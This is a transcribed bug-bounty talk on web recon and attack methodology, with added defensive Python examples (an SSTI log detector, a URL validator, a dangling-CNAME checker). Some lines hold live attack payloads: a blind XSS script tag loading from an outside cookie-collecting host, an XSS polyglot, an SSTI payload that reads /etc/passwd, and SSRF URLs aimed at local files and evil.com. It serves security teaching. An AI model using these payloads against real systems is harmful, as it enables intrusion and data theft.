The Bug Hunters Methodology 2


The Bug Hunters Methodology v2
whoami

★ Jason Haddix - @jhaddix
★ Head of Trust and Security @Bugcrowd
★ 2014-2015 top hunter on Bugcrowd (Top 50 currently)
★ Father, hacker, blogger, gamer!
What this talk is about...

Hack Stuff Better (and practically)
And... LOTS of memes... only some are funny
history && topics

v1, aka "How to Shot Web" @ DEFCON23:

★ philosophy shifts
★ discovery techniques
★ mapping methodology
★ parameters oft attacked
★ useful fuzz strings
★ bypass or filter evasion techniques
★ new/awesome tooling
★ memes

v1 topics:

★ Subdomain & Discovery
★ SQLi
★ XSS
★ File Uploads
★ CSRF
★ Privilege, Auth, IDOR
v2

★ MOAR discovery
★ Infrastructure and config
★ xss
★ ssti
★ ssrf
★ Code Inj / cmdi / advancements in fuzzing
★ light reading

v2.5:

★ API Testing
★ Object Deserialization
★ XXE
Discovery ++

Discovery

TBHMv1:
❏ Intro to scraping for subdomains
❏ Enumall (recon-ng, Alt-DNS wrapper)
❏ Nmap Standard

v2:
★ (sub scraping) Sublist3r
○ brutesubs
★ (sub bruting) MaSSDNS ++
○ all.txt list
★ (port scanning) MASSCAN ++
○ Asn + nmap style
Sub Scraping (recon-ng/enumall vs. Sublist3r)

Sources used by recon-ng/enumall only:
  ssltools.com API
  HackerTarget.com API
  Shodan
  ThreatCrowd
  Zoomeye (not core)
  Threatcrowd regged by email (not core)
  Zone transfer (not core)
  RiskIQ API (not core)
  Censys.io (not core)

Sources used by both:
  Google (Recon-ng now handles captcha)
  Bing
  Crt.sh
  Virustotal
  Netcraft

Sources used by Sublist3r only:
  Baidu
  Ask
  DNSDumpster (scans.io)
  Ptrarchive.com

★ Some configuration required
○ Update Docker image with non-core recon-ng modules
○ .env file
○ Disable Bruteforce (see why next...)
Sub Scraping (bespoke)

★ Cloudflare
★ Censys.io
★ Haven't tested but love the ideas
Sub Bruting

1,136,964 line subdomain dictionary (all.txt)

Tool                 Time to run   Threads   Found
subbrute             errored       100       0
gobuster             21m15.857s    100       87
massdns              1m24.167s     n/a       213
dns-parallel-prober  42m2.868s     100       43
blacksheepwall       256m9.385s    100       61

Commands used:

subbrute:
    time ./subbrute.py -c 100 all.txt $TARGET.com | tee subbrute.output

gobuster:
    time gobuster -m dns -u $TARGET.com -t 100 -w all.txt

massdns (subbrute.py only generates the candidate names here; massdns reads them from stdin and does the resolving):
    time ./subbrute.py /root/work/bin/all.txt $TARGET.com | ./bin/massdns -r resolvers.txt -t A -a -o -w massdns_output.txt -

dns-parallel-prober:
    time python dns-queue.py $TARGET.com 100 $TARGET_outputfile -i /root/work/bin/all.txt

blacksheepwall:
    time ./blacksheepwall_linux_amd64 -clean -dictionary /root/work/bin/all.txt -domain $TARGET.com

Sub Bruting

With Massdns, why not all of them?

all.txt: https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056
Acquisitions

★ Crunchbase
★ Protected by distil bot protection
★ Stay tuned
Port Scanning

65536 unverified hosts (a large target's ASN)

Tool      Time to run   Found
masscan   11m4.164s     196
nmap      zzz           -

You can use a conf file for this! The masscan command used:

    masscan -p1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389,280,4567,7001,8008,9080 -iL $TARGET_LIST --max-rate 100000 -oG $TARGET_OUTPUT

Visual Identification

★ Because of the nature of scraping and DNS redirects, some sites will be gone or the same.
★ Gotta get an idea of what is up and unique
★ We also don't know what protocol these are on (http vs https, ++)

Platform Identification and CVE searching

TBHMv1

PAUSE... NONE OF THIS REPLACES WALKING & UNDERSTANDING THE APP
Content Discovery / Directory Bruting

TBHMv1:
❏ Seclists / RAFT / Digger wordlists
❏ Patator
❏ WPScan
❏ cmsmap

v2:
★ Gobuster
★ Burp content discovery
★ Robots disallowed
★ ¯\_(ツ)_/¯

Parameter Bruting?

★ Yep! - Untested but love the idea
★ Can be combined with backslash scanner's top 2500 params
Discovery flow (one pass through the recon pipeline):

1. Domain -> Identify IPs and main TLDs
   ASNs, Reverse Whois, Acquisitions, ++
2. Domain bruteforcing, scraping for discovered TLDs
   enumall, sublist3r, Brutesubs, ++
3. Resolve && add new IP ranges
   Massdns
4. Portscan
   masscan
5. Visual Identification
   eyewitness, Manual
6. Platform Identification
   Builtwith, Wappalyzer, Vulners Burp Plugin, Burp analyze target
7. Content Discovery
   Gobuster, Burp, Wordlists, ++
8. Parameter discovery
   Parameth
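Step 3 of the flow ("Resolve && add new IP ranges") is where the resolved hosts get turned back into scope. The following is an added example, not code from the deck or from any of the tools it names: it parses constructed resolver output in a `name. TYPE value` shape (adapt real massdns output to this shape first), dedupes hosts for the visual-identification step, and works out which /24s fall outside the ranges assumed to be known from the ASN lookup. CNAME targets are skipped on purpose, since they are usually third-party infrastructure rather than the target's own address space.

```python
import ipaddress
from collections import defaultdict

# Constructed resolver output in a "name. TYPE value" shape (not real massdns
# output; adapt real tool output to this shape first). Documentation IPs only.
SAMPLE_RECORDS = """\
www.acme.com. A 203.0.113.10
api.acme.com. A 203.0.113.11
api.acme.com. A 203.0.113.11
old.acme.com. A 198.51.100.7
blog.acme.com. CNAME acme-blog.example-host.net.
acme-blog.example-host.net. A 192.0.2.44
"""

# Assumed ranges already attributed to the target (e.g. from its ASN lookup).
KNOWN_RANGES = [ipaddress.ip_network("203.0.113.0/24")]

def parse_records(text):
    """Return (a_records, cnames): name -> set of IPs, and name -> CNAME target."""
    a_records, cnames = defaultdict(set), {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # blank or malformed line
        name, rtype, value = parts[0].rstrip("."), parts[1], parts[2].rstrip(".")
        if rtype == "A":
            a_records[name].add(ipaddress.ip_address(value))
        elif rtype == "CNAME":
            cnames[name] = value
    return a_records, cnames

def new_ranges(a_records, cnames, known, prefix=24):
    """Networks to add to scope: /prefix blocks around IPs outside the known
    ranges. Names that are only CNAME targets are skipped because they are
    usually third-party infrastructure, not the target's own address space."""
    third_party = set(cnames.values())
    found = set()
    for name, ips in a_records.items():
        if name in third_party:
            continue
        for ip in ips:
            if not any(ip in net for net in known):
                found.add(ipaddress.ip_network(f"{ip}/{prefix}", strict=False))
    return sorted(found)

def live_hosts(a_records):
    """Deduplicated names that resolved: the input list for visual identification."""
    return sorted(a_records)

if __name__ == "__main__":
    a, c = parse_records(SAMPLE_RECORDS)
    print("live:", live_hosts(a))
    print("new ranges:", [str(n) for n in new_ranges(a, c, KNOWN_RANGES)])
```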
XSS

XSS (not a lot)

TBHMv1:
❏ polyglots
❏ Seclists (what up dan!)
❏ Flash
❏ Common input vectors

v2:
★ Blind XSS Frameworks
○ Sleepy Puppy (python)
○ XSS Hunter (python)
○ Ground control (Ruby)(small)
★ Polyglots
★ XSS mindmap
Blind XSS

[Figure: blind XSS flow. (1) Jamie: "I really enjoy my super admin access this morning !!!" (2) Frans: "I really enjoy my NEW super admin access this morning !!!" followed by the payload "><script src=//y.vg></script> (3) XSSHunter (y.vg is a java...) (4) script shell: BUG]
XSSHunter

Payload collects:

★ The vulnerable page's URI
★ Origin of Execution
★ The Victim's IP Address
★ The Page Referer
★ The Victim's User Agent
★ All Non-HTTP-Only Cookies
★ The Page's Full HTML DOM
★ Full Screenshot of the Affected Page
★ Responsible HTTP Request (If an XSS Hunter compatible tool is used)
★ Nod to beef & XSShell
XSS Polyglot #4

    jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Jackmasa's XSS Mindmap
Server Side Template Injection

SSTI

TBHMv1:
❏ Nothing

Core Idea: Does the application utilize a template engine? ++

★ Engine identification
○ WAPPalyzer + BuiltWith + Vulners scanner
○ Test fuzzing
★ Tooling
○ TPLmap + tplmap Burp Extension
○ Backslash powered scanner?
★ Resources
SSTI

1: https://acme.com/errorpage{{2*3}}

2: https://acme.com/errorpage{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
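The detection-side view of the two probes above, as an added example that is not part of the deck: a small classifier that runs over constructed access-log lines (combined log format is assumed) and flags template-expression markers in request targets, rating an expression that contains arithmetic or Python dunder attributes higher than a bare placeholder such as {{version}}, which is often benign.

```python
import re
from urllib.parse import unquote

# Expression delimiters of common template engines; a probe such as {{2*3}} or
# ${7*7} in a request path or parameter is the fingerprinting step from the slide.
PROBE_PATTERNS = [
    re.compile(r"\{\{.*?\}\}"),   # Jinja2 / Twig / Handlebars
    re.compile(r"\$\{.*?\}"),     # FreeMarker / Velocity / Thymeleaf
    re.compile(r"<%.*?%>"),       # ERB / JSP style
    re.compile(r"#\{.*?\}"),      # Ruby interpolation / Pebble
]
# Stronger signal inside the expression: arithmetic or Python object-walking attributes.
SUSPICIOUS_BODY = re.compile(r"\d\s*[*+]\s*\d|__class__|__mro__|__subclasses__")

# Constructed access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
198.51.100.23 - - [10/Oct/2017:13:55:36 +0000] "GET /errorpage%7B%7B2*3%7D%7D HTTP/1.1" 200 512
198.51.100.23 - - [10/Oct/2017:13:55:40 +0000] "GET /errorpage{{''.__class__.__mro__}} HTTP/1.1" 500 133
203.0.113.8 - - [10/Oct/2017:13:56:01 +0000] "GET /search?q=%24%7B7*7%7D HTTP/1.1" 200 2048
203.0.113.9 - - [10/Oct/2017:13:57:10 +0000] "GET /docs/{{version}} HTTP/1.1" 404 88
203.0.113.9 - - [10/Oct/2017:13:58:00 +0000] "GET /index.html HTTP/1.1" 200 4096
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(line):
    """None for a clean line, else a finding dict. Severity is 'high' when the
    expression body looks like evaluation (arithmetic, dunder attributes) and
    'low' for bare placeholders, which are often legitimate application paths."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, ts, method, target, status = m.groups()
    decoded = unquote(target)            # probes usually arrive URL-encoded
    for pat in PROBE_PATTERNS:
        hit = pat.search(decoded)
        if hit:
            sev = "high" if SUSPICIOUS_BODY.search(hit.group(0)) else "low"
            return {"client": client, "time": ts, "method": method, "path": decoded,
                    "probe": hit.group(0), "status": status, "severity": sev}
    return None

def scan_log(text):
    """Findings for every line of an access log, in file order."""
    return [f for f in (classify(line) for line in text.splitlines()) if f]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:4} {f['client']:15} {f['status']} {f['probe']}")
```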
SSTI Tooling

Resources

SSTI Original Whitepaper - James Kettle
http://blog.portswigger.net/2015/08/server-side-template-injection.html

OWASP SSTI Workshop - Gérôme Dieu
https://speakerdeck.com/owaspmontreal/workshop-server-side-template-injection-ssti

Exploring SSTI in Flask/Jinja2 - Tim Tomes
https://www.lanmaster53.com/2016/03/exploring-ssti-flask-jinja2/
https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/

Injecting Flask - Ryan Reid
https://nvisium.com/blog/2015/12/07/injecting-flask/

Rails Dynamic Render to RCE (CVE-2016-0752) - John Poulin
https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/

uber.com may RCE by Flask Jinja2 Template Injection - Orange Tsai
https://hackerone.com/reports/125980

Hi Pete!
Server Side Request Forgery

SSRF

TBHMv1:
❏ Nothing
❏ Well kinda... SSRF (visually) looks very similar to LFI / RFI / Path/dir Traversal!
❏ REMIX!
○ ^ "Blind detection of path traversal-vulnerable file uploads"

★ Where? (see the parameter list below)
★ Resources
○ SSRF Bible (black magic)
★ Exploit
○ Burp Collaborator
★ Honourable mention:

SSRF Common Parameters or Injection points from TBHMv1:

file= folder= location= style= locale= template= path= doc= display= source= load= pdf= read= dest= retrieve= continue=
SSRF (GET examples)

http://ACME.com/redirect.php?url=http://google.com
http://ACME.com/redirect.php?url=//google.com
http://ACME.com/redirect.php?url=google.com
http://ACME.com/redirect.php?url=/PATH/SOMETHING/here
http://ACME.com/redirect.php?url=file:///etc/passwd
http://acme.com/ssrf.php?url=tftp://evil.com:12346/TESTPACKET
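The six URL shapes above are exactly what a `url=` parameter validator has to get right. The following is an added example (not code from the deck or from any ACME application) showing the substring check that lets them through beside two hardened checks: an exact-host allow-list for redirect targets, and a scheme plus globally-routable-address check for server-side fetchers that cannot allow-list hosts. The allow-list, the resolver table and the probe strings are all assumptions constructed for the example.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"acme.com", "www.acme.com"}   # assumed allow-list for redirect.php

# Constructed inputs in the shapes shown on the slide, plus two substring traps.
PROBES = [
    "http://google.com",                # absolute, off-site
    "//google.com",                     # scheme-relative: browsers go off-site
    "google.com",                       # bare host: urlsplit treats it as a path
    "/PATH/SOMETHING/here",             # relative path
    "file:///etc/passwd",               # local file scheme
    "tftp://evil.com:12346/TESTPACKET", # non-http scheme
    "http://acme.com.evil.com/",        # trusted name as a substring
    "http://evil.com/?next=acme.com",   # trusted name as a substring
    "https://www.acme.com/account",     # the only legitimate one
]

def weak_check(url):
    """Typical broken validation: substring match on the trusted domain."""
    return "acme.com" in url

def hardened_check(url, allowed_hosts=ALLOWED_HOSTS):
    """Redirect targets: only absolute http(s) URLs whose exact host is allow-listed."""
    try:
        parts = urlsplit(url.strip())
    except ValueError:
        return False
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False                  # file:, tftp:, //host and bare values
    if not parts.netloc or "@" in parts.netloc:
        return False                  # no host, or user@host confusion
    return (parts.hostname or "").lower() in allowed_hosts

def safe_to_fetch(url, resolve):
    """Server-side fetchers (ssrf.php?url=) with no host allow-list: require http(s)
    and a host that resolves to a globally routable address. `resolve` is injected
    so this runs offline; a real fetcher must also connect to the IP it validated
    rather than re-resolve the name (DNS rebinding)."""
    parts = urlsplit(url.strip())
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    try:
        ip = ipaddress.ip_address(resolve(parts.hostname))
    except (ValueError, KeyError, TypeError):
        return False                  # unresolvable, or not an IP literal
    return ip.is_global and not ip.is_multicast  # drops 127/8, RFC1918, 169.254/16

# Constructed stand-in resolver; 169.254.169.254 is the cloud metadata address.
FAKE_DNS = {"public.example": "93.184.216.34", "metadata.internal": "169.254.169.254",
            "localhost": "127.0.0.1", "intranet.acme.com": "10.0.0.5"}
```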
SSRF Resources

★ protocol and schema mappings
★ Exploit examples

Pivoting from blind SSRF to RCE with HashiCorp Consul - Peter Adkins
http://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-Consul.html

Exploiting Server Side Request Forgery on a Node/Express Application (hosted on Amazon EC2) - Seth Art
https://sethsec.blogspot.com/2015/12/exploiting-server-side-request-forgery.html

Server-side browsing considered harmful - Nicolas Grégoire
http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf

How To: Server-Side Request Forgery (SSRF) - Jobert Abma
https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF

Escalating XSS in PhantomJS Image Rendering to SSRF/Local-File Read - Brett Buerhaus
http://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/

Burp, Collaborate, and Listen: A Pentester Reviews the Latest Burp Suite Addition - Max Zinkus
https://www.bishopfox.com/blog/2016/02/burp-collaborate-listen-pentester-reviews-latest-burp-suite-addition/
Code Inj, CMDi, & Future Fuzzing

Code Injection + CMD Injection + New Fuzzing

TBHMv1:
❏ Sqli
❏ Polyglot
❏ Seclists
❏ Sqlmap
❏ Params
❏ Tooling
❏ resources

v2:
★ Commix
○ CMDi
○ Supports php code inj
★ Unknown Identification
○ Backslash Powered Scanner
★ resources
○ albinowax (James Kettle)

Code Injection + CMD Injection

★ Commix pros
○ Command injection
○ Supports php code inj
○ Custom modules
○ PS & PY shells
○ Put many memes in their slides

Backslash Powered Scanner

★ Generic payloads for any stack
○ Send a ' and get an error
○ Send a \' and the backslash escapes your injection character, so the error goes away
★ Multi-tiered, simple, and effective response analysis
○ Response code
○ Response size
○ keywords
★ Watch the video then read the paper =)
○ https://broadcast.comdi.com/r7rwcspee75eewbu8a0f
○ http://blog.portswigger.net/2016/11/backslash-powered-scanning-hunting.html
Infrastructure & Config

Subdomain takeover!

★ Pretty simple: check for CNAMEs that resolve to these services; if the service has lapsed, register and profit!
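The same check from the asset owner's side, as an added example that is not code from the deck or from the takeover tools it links: given CNAME records and a resolver, report subdomains that point at a third-party host which no longer resolves. The provider suffix list, the records and the resolver table are constructed assumptions; the S3 entry is left resolving on purpose, because some providers keep answering DNS for a released name and only the service-specific HTTP response reveals the lapse, which this DNS-only pass will not catch.

```python
# Illustrative suffixes of third-party services that subdomains are commonly
# CNAMEd to (assumed list; extend with the providers your organisation uses).
THIRD_PARTY_SUFFIXES = (".s3.amazonaws.com", ".github.io", ".herokuapp.com", ".cloudfront.net")

# Constructed CNAME records for a reserved example domain: subdomain -> target.
CNAMES = {
    "docs.example.com": "example-docs.github.io.",        # trailing dot, as in zone files
    "files.example.com": "example-files.s3.amazonaws.com",
    "www.example.com": "d111111abcdef8.cloudfront.net",
    "shop.example.com": "shop-prod.internal.example.com",
}

# Constructed stand-in for DNS resolution: target -> address, None = does not
# resolve. A real check would query DNS for each target instead.
RESOLVES = {
    "d111111abcdef8.cloudfront.net": "192.0.2.5",
    "shop-prod.internal.example.com": "198.51.100.9",
    "example-files.s3.amazonaws.com": "192.0.2.77",   # still resolves (wildcard DNS)
    "example-docs.github.io": None,                    # NXDOMAIN: lapsed
}

def normalise(host):
    return host.rstrip(".").lower()

def is_third_party(target):
    return any(normalise(target).endswith(s) for s in THIRD_PARTY_SUFFIXES)

def dangling_cnames(cnames, resolve):
    """Sorted (subdomain, target) pairs where the target is a third-party host
    that no longer resolves: the precondition the slide describes. A missing
    answer is a signal, not proof; providers whose wildcard DNS keeps answering
    (S3 is one) need a follow-up, provider-specific HTTP check to confirm."""
    findings = []
    for sub, target in sorted(cnames.items()):
        target = normalise(target)
        if is_third_party(target) and resolve(target) is None:
            findings.append((sub, target))
    return findings

def third_party_cnames(cnames):
    """Every subdomain that depends on a third-party host: the watch-list for
    the follow-up HTTP check, whether or not DNS still answers today."""
    return sorted(sub for sub, t in cnames.items() if is_third_party(t))

if __name__ == "__main__":
    for sub, target in dangling_cnames(CNAMES, RESOLVES.get):
        print(f"ALERT dangling CNAME: {sub} -> {target}")
```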
Subdomain Takeover
Robbing Misconfigured Sh** (AWS)
Robbing Misconfigured Sh** (git)
Bespoke .nfo

resources!

TBHMv1

https://www.slideshare.net/bugcrowd/how-do-i-shot-web-jason-haddix-at-defcon-23
https://www.youtube.com/watch?v=-FAjxUOKbdI
https://github.com/jhaddix/tbhm

Updates coming soon...

Jason Haddix - @jhaddix
[email protected]
Links

Peter Yaworski (Web Hacking 101 Book) https://leanpub.com/web-hacking-101
Andy Gill (Breaking into Infosec) https://leanpub.com/ltr101-breaking-into-infosec
Aboul3la (Sublist3r) https://github.com/aboul3la/Sublist3r
Prakhar Prasad (Mastering Modern Web Penetration Testing) https://www.packtpub.com/networking-and-servers/mastering-modern-web-penetration-testing
Jhaddix (enumall) https://github.com/jhaddix/domain
Tim Tomes (Recon-ng) https://bitbucket.org/LaNMaSteR53/recon-ng
@infosec_au & @nnwakelam (Alt-DNS) https://github.com/infosec-au/altdns
Blechschmidt (Massdns) https://github.com/blechschmidt/massdns
Robertdavidgraham (Masscan) https://github.com/robertdavidgraham/masscan
jhaddix (all.txt domain word list) https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056
Anshumanbh (Brutesubs) https://github.com/anshumanbh/brutesubs
OJ Reeves (Gobuster) https://github.com/OJ/gobuster
Epinna (Tplmap) https://github.com/epinna/tplmap
Mak0 (parameth) https://github.com/mak-/parameth
vulnersCom (burp-vulners-scanner) https://github.com/vulnersCom/burp-vulners-scanner
ChrisTruncer (Eyewitness) https://github.com/ChrisTruncer/EyeWitness
Jackmasa (XSS Mindmap) https://github.com/jackmasa/XSS.png
Anshumanbh (censys.py sub scraper) https://gist.github.com/anshumanbh/96a0b81dfe318e9e956013209e178fa9
Scumsec (non-core recon-ng modules) https://github.com/scumsec/Recon-ng-modules
Vlad Styran (non-core recon-ng modules) https://bitbucket.org/LaNMaSteR53/recon-ng/pull-requests/260/add-passivetotal-subdomains-enumerator/diff#chg-modules/recon/domains-hosts/passivetotal_subdomains.py
Mandatoryprogrammer (Cloudflare_enum) https://github.com/mandatoryprogrammer/cloudflare_enum
Daniel Miessler (Robots Disallowed) https://github.com/danielmiessler/RobotsDisallowed
Lorenzog (dns-parallel-prober) https://github.com/lorenzog/dns-parallel-prober
SSRF Bible https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit#
Ewilded (psychoPATH) https://github.com/ewilded/psychoPATH
Commix https://github.com/commixproject/commix
Albinowax (Top 2500 alexa parsed param names) https://github.com/PortSwigger/backslash-powered-scanner/blob/master/resources/params
Netflix (SleepyPuppy Blind XSS framework) https://github.com/Netflix/sleepy-puppy
Mandatoryprogrammer (xsshunter) https://github.com/mandatoryprogrammer/xsshunter
Jobertabma (ground-control) https://github.com/jobertabma/ground-control
0xSobky (XSS polyglot #4) https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
PortSwigger / Albinowax (Backslash Powered Scanner) https://github.com/PortSwigger/backslash-powered-scanner
JordyZomer (autoSubTakeover) https://github.com/JordyZomer/autoSubTakeover
Nahamsec (HostileSubBruteforcer) https://github.com/nahamsec/HostileSubBruteforcer
Anshumanbh (tko-subs) https://github.com/anshumanbh/tko-subs
Frans Rosen (A deep dive into AWS S3 access controls – taking full control over your assets) https://labs.detectify.com/2017/07/13/a-deep-dive-into-aws-s3-access-controls-taking-full-control-over-your-assets/
yasinS (sandcastle) https://github.com/yasinS/sandcastle
Robin Wood (bucketfinder) https://digi.ninja/projects/bucket_finder.php
Michenriksen (gitrob) https://github.com/michenriksen/gitrob
Dxa4481 (truffleHog) https://github.com/dxa4481/truffleHog
Bug Bounty Forum https://bugbountyforum.com/

Cool Curation:
https://github.com/qazbnm456/awesome-web-security
https://github.com/infoslack/awesome-web-hacking
https://github.com/djadmin/awesome-bug-bounty
